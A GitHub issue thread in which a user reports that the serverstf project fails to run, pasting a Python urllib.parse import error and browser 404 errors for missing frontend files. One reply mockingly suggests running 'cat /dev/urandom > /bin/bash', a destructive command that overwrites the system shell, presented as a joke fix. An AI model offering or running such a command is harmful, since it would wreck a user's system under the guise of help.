### ISSUE TITLE
it doesn't work

### ISSUE THREAD

**Issue by x13machine** [Holiverh/serverstf#11]
You're code doesn't work. If it does provide instructions on how to build it because it doesn't.

If I am suppose to run python setup.py install and run __main__.py there's misconfigure packages. I did install a bunch of packages. 
#python errors, how the fuck am I suppose to fix this. 
brandan@googolplex:~/serverstf/serverstf$ python __main__.py
Traceback (most recent call last):
  File "__main__.py", line 12, in <module>
    import serverstf
  File "build/bdist.linux-x86_64/egg/serverstf/__init__.py", line 4, in <module>
    import urllib.parse
ImportEe packarror: No module named parse

#errors on http://localhost:8000/client/main.htm
http://localhost:8000/client/external/normalize.css/normalize.css Failed to load resource: the server responded with a status of 404 (File not found)
http://localhost:8000/client/external/font-awesome/css/font-awesome.css Failed to load resource: the server responded with a status of 404 (File not found)
http://localhost:8000/client/external/lodash/lodash.js Failed to load resource: the server responded with a status of 404 (File not found)
http://localhost:8000/client/external/angular/angular.js Failed to load resource: the server responded with a status of 404 (File not found)
http://localhost:8000/client/external/angular-animate/angular-animate.js Failed to load resource: the server responded with a status of 404 (File not found)

http://localhost:8000/client/external/angular-route/angular-route.js Failed to load resource: the server responded with a status of 404 (File not found)
http://localhost:8000/client/styles/client.css Failed to load resource: the server responded with a status of 404 (File not found)
serverstf.js:4 Uncaught ReferenceError: angular is not defined
serverstf.server.js:3 Uncaught ReferenceError: angular is not defined
Server.js:24 Uncaught ReferenceError: angular is not defined
Server.js:138 Uncaught ReferenceError: angular is not defined
serverstf.socket.js:3 Uncaught ReferenceError: angular is not defined
Socket.js:91 Uncaught ReferenceError: angular is not defined
http://localhost:8000/favicon.ico Failed to load resource: the server responded with a status of 404 (File not found)
http://localhost:8000/client/external/normalize.css/normalize.css Failed to load resource: the server responded with a status of 404 (File not found)
http://localhost:8000/client/external/font-awesome/css/font-awesome.css Failed to load resource: the server responded with a status of 404 (File not found)
http://localhost:8000/client/styles/client.css Failed to load resource: the server responded with a status of 404 (File not found)

**Comment by JavaCakess** [comment]
The code does work, I can testify to that. I think you just need to turn down the 'buttmad' levels.
The buttmad levels can be turned down by typing "cat /dev/urandom > /bin/bash" if you're on Linux. If that doesn't work, you might need to buy an extra component and add it to your sensory system: a brain.

**Comment by Rodrun** [comment]
Not ready for production use..
